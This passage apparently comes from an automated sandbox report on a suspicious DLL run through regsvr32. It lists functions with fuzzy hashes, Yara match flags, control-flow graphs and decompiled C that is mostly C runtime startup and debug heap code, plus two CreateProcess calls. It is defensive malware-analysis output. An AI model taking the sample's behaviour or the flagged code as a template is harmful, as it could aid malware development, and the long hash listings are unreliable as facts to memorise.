                                                      • Instruction Fuzzy Hash: 28A1377051478CDBDBAADF28C8C9AD93BA1FF48394FA05219FD0287251CB75D985CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180019628 Relevance: 3.1, Strings: 2, Instructions: 565COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: f+hb$zm
                                                      • API String ID: 0-4294548274
                                                      • Opcode ID: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                      • Instruction ID: b2f4f577a3df5b024e80de80ecfd692f42b94ed80d4232126a84951cd6e5a716
                                                      • Opcode Fuzzy Hash: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                      • Instruction Fuzzy Hash: 4852C97050068D8FDF98DF68C8866DA3BA1FB58388F124319FC8AA7291D778D655CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018002ACE8 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #U6
                                                      • API String ID: 0-3443268899
                                                      • Opcode ID: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                      • Instruction ID: 59d24509ec93e958c93c94dd97d6e32fc772fd919bc53da4f0cdd3954875abf9
                                                      • Opcode Fuzzy Hash: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                      • Instruction Fuzzy Hash: 57510E715087888BC7B8DF28C49A6CBBBF1FF86344F10091DE68987260CB76D949CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D27640 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 290COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 160 7fef9d27640-7fef9d27671 GetStartupInfoW call 7fef9d24980 162 7fef9d27676-7fef9d27687 160->162 163 7fef9d27693-7fef9d276ac 162->163 164 7fef9d27689-7fef9d2768e 162->164 166 7fef9d276c2-7fef9d276d7 163->166 165 7fef9d27cee-7fef9d27cf5 164->165 167 7fef9d2777d-7fef9d27784 166->167 168 7fef9d276dd-7fef9d27778 166->168 170 7fef9d27ad6-7fef9d27afb 167->170 171 7fef9d2778a-7fef9d27790 167->171 168->166 176 7fef9d27b01-7fef9d27b2e 170->176 177 7fef9d27ce0-7fef9d27cec SetHandleCount 170->177 171->170 172 7fef9d27796-7fef9d277de 171->172 174 7fef9d277f0 172->174 175 7fef9d277e0-7fef9d277ee 172->175 178 7fef9d277fb-7fef9d27833 174->178 175->178 179 7fef9d27b30-7fef9d27b3c 176->179 180 7fef9d27b42-7fef9d27b56 176->180 177->165 185 7fef9d27975-7fef9d279c7 178->185 186 7fef9d27839-7fef9d2786e call 7fef9d24980 178->186 179->180 182 7fef9d27cc0-7fef9d27cd8 179->182 183 7fef9d27b65-7fef9d27b6d 180->183 184 7fef9d27b58-7fef9d27b63 180->184 187 7fef9d27cdb 182->187 188 7fef9d27b6f-7fef9d27b7a 183->188 189 7fef9d27b7c 183->189 190 7fef9d27b95-7fef9d27bb3 GetStdHandle 184->190 185->170 197 7fef9d279cd-7fef9d279d9 185->197 203 7fef9d27870-7fef9d2787d 186->203 204 7fef9d27882-7fef9d278ac 186->204 187->177 195 7fef9d27b87-7fef9d27b8e 188->195 189->195 191 7fef9d27c95-7fef9d27cb7 190->191 192 7fef9d27bb9-7fef9d27bc2 190->192 199 7fef9d27cbe 191->199 192->191 196 7fef9d27bc8-7fef9d27be5 GetFileType 192->196 195->190 196->191 200 7fef9d27beb-7fef9d27c0d 196->200 201 7fef9d27ad1 197->201 202 7fef9d279df-7fef9d279eb 197->202 199->187 205 7fef9d27c0f-7fef9d27c29 200->205 206 7fef9d27c2b-7fef9d27c3a 200->206 201->170 202->201 207 7fef9d279f1-7fef9d27a01 202->207 203->185 208 7fef9d278c2-7fef9d278e3 204->208 209 7fef9d27c56-7fef9d27c72 InitializeCriticalSectionAndSpinCount 205->209 206->209 210 7fef9d27c3c-7fef9d27c53 206->210 207->201 211 7fef9d27a07-7fef9d27a17 207->211 212 7fef9d27970 208->212 213 7fef9d278e9-7fef9d2796b 208->213 214 7fef9d27c74-7fef9d27c79 209->214 215 7fef9d27c7b-7fef9d27c93 209->215 210->209 216 7fef9d27a32-7fef9d27aad InitializeCriticalSectionAndSpinCount 211->216 217 7fef9d27a19-7fef9d27a2c GetFileType 211->217 212->185 213->208 214->165 215->199 219 7fef9d27aaf-7fef9d27ab4 216->219 220 7fef9d27ab9-7fef9d27ace 216->220 217->201 217->216 219->165 220->201
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                      • API String ID: 1930727954-3864165772
                                                      • Opcode ID: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                      • Instruction ID: 1d91a8b9fbbdfe7efb2cec2f51c290a43986955e3ccc02e10ec1e86e5f3f07e0
                                                      • Opcode Fuzzy Hash: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                      • Instruction Fuzzy Hash: 88F1D82260DBC5C9E7B08B19E88076EB7A0F385B64F258226CAED477E4DB3DD445CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D27DE0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 109COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                      • String ID: _setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                      • API String ID: 1648969265-681193798
                                                      • Opcode ID: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                      • Instruction ID: 6f04160d34b6c1fe028a5367eccc3c8ebf9b699179af2d046024218ded9634d0
                                                      • Opcode Fuzzy Hash: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                      • Instruction Fuzzy Hash: 14514F31A1DB8682EB90CB19E88576E77E0F385794F704126EACE477B4DB7EE4408B41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D27280 Relevance: 12.1, APIs: 8, Instructions: 104COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                      • String ID:
                                                      • API String ID: 3799933513-0
                                                      • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                      • Instruction ID: 37cfb5e84e154ae2fbcc5f75e30e47dd1cf7b4373ba061ec72f9a9691eeac49a
                                                      • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                      • Instruction Fuzzy Hash: 36511C3291DB4281E6A09B58EC8436EB7E0F386794F315125EACD427B9DF7EE544CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D28670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                      • API String ID: 1823725401-2473407871
                                                      • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                      • Instruction ID: f3219d0a3466b597a7d077589c81ae53176584dcfccb647f84a4fae4f36a6977
                                                      • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                      • Instruction Fuzzy Hash: B141A536618B8586E794CB56F84432FB7E1F785B94F200429EBCD47BA8DBBED4448B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D23D30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000007FEF9D27540: _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                        • Part of subcall function 000007FEF9D27540: _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                        • Part of subcall function 000007FEF9D28FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000007FEF9D2906F
                                                      • FlsAlloc.KERNEL32 ref: 000007FEF9D23D55
                                                        • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                        • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                                      • API String ID: 3828364660-3898981997
                                                      • Opcode ID: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                      • Instruction ID: 54e8e70dd377f15c5e8b83e2f7140eab641006b368099d9e1d163193fdf976c7
                                                      • Opcode Fuzzy Hash: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                      • Instruction Fuzzy Hash: 5A115E30A2D60286F3E0AB25ED4577DA6E1B784B60F215671E9EE422F5DB2FE4048611
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2461B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 50%
                                                      			E000007FE7FEF9D2461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
				signed int _t64;
				intOrPtr _t66;
				void* _t73;
				void* _t92;
				long long _t98;
				long long _t113;
				long long _t114;
				long long _t115;
				long long _t130;
				intOrPtr _t132;
				long long _t135;

				if (_a136 == 1) goto 0xf9d24672;
				_t64 = _a136 & 0x0000ffff;
				if (_t64 == 2) goto 0xf9d24672;
				if (_a136 == 3) goto 0xf9d24672;
				_a40 = "Error: memory allocation: bad memory block type.\n";
				_a32 = "%s";
				r9d = 0;
				r8d = 0;
				0xf9d2ad00();
				if (_t64 != 1) goto 0xf9d24672;
				asm("int3");
				_t98 = _a128 + 0x34;
				_a96 = _t98;
				0xf9d2ac90(); // executed
				_a80 = _t98;
				if (_a80 != 0) goto 0xf9d246b8;
				if (_a160 == 0) goto 0xf9d246b3;
				 *_a160 = 0xc;
				goto 0xf9d248b4;
				_t66 =  *0xf9d4b03c; // 0x38
				 *0xf9d4b03c = _t66 + 1;
				if (_a64 == 0) goto 0xf9d2472d;
				 *_a80 = 0;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = 0;
				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = 3;
				 *((intOrPtr*)(_a80 + 0x28)) = 0;
				goto 0xf9d24844;
				if (0xffffffff -  *0xf9d4c960 - _a128 <= 0) goto 0xf9d24763;
				_t130 =  *0xf9d4c960; // 0x42cc
				 *0xf9d4c960 = _t130 + _a128;
				goto 0xf9d2476e;
				 *0xf9d4c960 = 0xffffffff;
				_t132 =  *0xf9d4c990; // 0xa0c
				 *0xf9d4c990 = _t132 + _a128;
				_t113 =  *0xf9d4c978; // 0x32f4
				_t92 =  *0xf9d4c990 - _t113; // 0xa0c
				if (_t92 <= 0) goto 0xf9d247a8;
				_t114 =  *0xf9d4c990; // 0xa0c
				 *0xf9d4c978 = _t114;
				if ( *0xf9d4c980 == 0) goto 0xf9d247c4;
				_t115 =  *0xf9d4c980; // 0x2363b00
				 *((long long*)(_t115 + 8)) = _a80;
				goto 0xf9d247d0;
				 *0xf9d4c968 = _a80;
				_t135 =  *0xf9d4c980; // 0x2363b00
				 *_a80 = _t135;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = _a144;
				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = _a136;
				_t78 = _a88;
				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
				 *0xf9d4c980 = _a80;
				r8d = 4;
				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
				_t145 = _a128;
				r8d = 4;
				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
				_t73 = E000007FE7FEF9D232B0( *0xf9d4b04f & 0x000000ff, _t78,  *0xf9d4b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
				_a72 = _a80 + 0x30;
				return E000007FE7FEF9D29360(_t73, 4);
			}














                                                      0x7fef9d24623
                                                      0x7fef9d2462c
                                                      0x7fef9d24634
                                                      0x7fef9d2463e
                                                      0x7fef9d24647
                                                      0x7fef9d24653
                                                      0x7fef9d24658
                                                      0x7fef9d2465b
                                                      0x7fef9d24665
                                                      0x7fef9d2466d
                                                      0x7fef9d2466f
                                                      0x7fef9d2467a
                                                      0x7fef9d2467e
                                                      0x7fef9d24688
                                                      0x7fef9d2468d
                                                      0x7fef9d24698
                                                      0x7fef9d246a3
                                                      0x7fef9d246ad
                                                      0x7fef9d246b3
                                                      0x7fef9d246b8
                                                      0x7fef9d246c0
                                                      0x7fef9d246cb
                                                      0x7fef9d246d2
                                                      0x7fef9d246de
                                                      0x7fef9d246eb
                                                      0x7fef9d246f8
                                                      0x7fef9d2470c
                                                      0x7fef9d24715
                                                      0x7fef9d24721
                                                      0x7fef9d24728
                                                      0x7fef9d24743
                                                      0x7fef9d2474d
                                                      0x7fef9d2475a
                                                      0x7fef9d24761
                                                      0x7fef9d24763
                                                      0x7fef9d24776
                                                      0x7fef9d24783
                                                      0x7fef9d2478a
                                                      0x7fef9d24791
                                                      0x7fef9d24798
                                                      0x7fef9d2479a
                                                      0x7fef9d247a1
                                                      0x7fef9d247b0
                                                      0x7fef9d247b2
                                                      0x7fef9d247be
                                                      0x7fef9d247c2
                                                      0x7fef9d247c9
                                                      0x7fef9d247d5
                                                      0x7fef9d247dc
                                                      0x7fef9d247e4
                                                      0x7fef9d247f9
                                                      0x7fef9d24809
                                                      0x7fef9d24819
                                                      0x7fef9d24829
                                                      0x7fef9d24831
                                                      0x7fef9d24835
                                                      0x7fef9d2483d
                                                      0x7fef9d24854
                                                      0x7fef9d2485c
                                                      0x7fef9d2486d
                                                      0x7fef9d2487a
                                                      0x7fef9d24882
                                                      0x7fef9d248a1
                                                      0x7fef9d248af
                                                      0x7fef9d248c7

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _unlock
                                                      • String ID: Error: memory allocation: bad memory block type.
                                                      • API String ID: 2480363372-1537269110
                                                      • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                      • Instruction ID: 3c0f980f6ccd09ea8afc11027f8ae4c535623d5f1e7c019e481493293b97b3b1
                                                      • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                      • Instruction Fuzzy Hash: 4B71EB36A09B8586DBA0CB59E89036EB7E0F3C9B90F218526DADD437A4DF7DD044CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180024EE6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: z
                                                      • API String ID: 963392458-1375040831
                                                      • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                      • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                      • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                      • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180024F28 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: z
                                                      • API String ID: 963392458-1375040831
                                                      • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                      • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                      • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                      • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D26FF2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer_initterm_e
                                                      • String ID: Y
                                                      • API String ID: 1618838664-1754117475
                                                      • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                      • Instruction ID: e2eda9ea6841371ef03f52dec0317b7f8d7542193ab5d09d46fee122be74aa2a
                                                      • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                      • Instruction Fuzzy Hash: 1DE0C22190C042A7FAA1AB24ED453BE63E0B791344FA14231E2CD824B5EB2FF908CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D27540 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E000007FE7FEF9D27540(long long __rax) {
				long long _v24;
				void* _t8;
				void* _t9;

				_t16 = __rax;
				_t9 = E000007FE7FEF9D23D00(_t8); // executed
				_v24 = __rax;
				return E000007FE7FEF9D2CF20(E000007FE7FEF9D2CFB0(E000007FE7FEF9D2D450(E000007FE7FEF9D2D470(E000007FE7FEF9D2BD50(E000007FE7FEF9D2AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
			}






                                                      0x7fef9d27540
                                                      0x7fef9d27544
                                                      0x7fef9d27549
                                                      0x7fef9d2758e

                                                      APIs
                                                        • Part of subcall function 000007FEF9D23D00: RtlEncodePointer.NTDLL ref: 000007FEF9D23D06
                                                      • _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                      • _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                        • Part of subcall function 000007FEF9D2CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF9D2758A,?,?,?,?,?,?,000007FEF9D23D39), ref: 000007FEF9D2CF30
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                      • String ID:
                                                      • API String ID: 2678799220-0
                                                      • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                      • Instruction ID: d1131ca10be328b200f0d94da683d71e83c9d45f094ccb2362bb8b9ac37f618d
                                                      • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                      • Instruction Fuzzy Hash: CFE07D6391D58181E6B0BB21EC5226E93B0F7C8788F610171B6CD47A7BCE1DE9018B80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2ACA8 Relevance: 3.0, APIs: 2, Instructions: 15memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess$AllocateHeap__crt
                                                      • String ID:
                                                      • API String ID: 4215626177-0
                                                      • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                      • Instruction ID: 018cd22ed3aaffe80bc67b356604b0c029bcf26b5d2cff022e0890546f5cf117
                                                      • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                      • Instruction Fuzzy Hash: AFE04F2490898683E7A49726E80037D63E0FB84348F614036D7CE026F5CF2FE840E601
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D24399 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
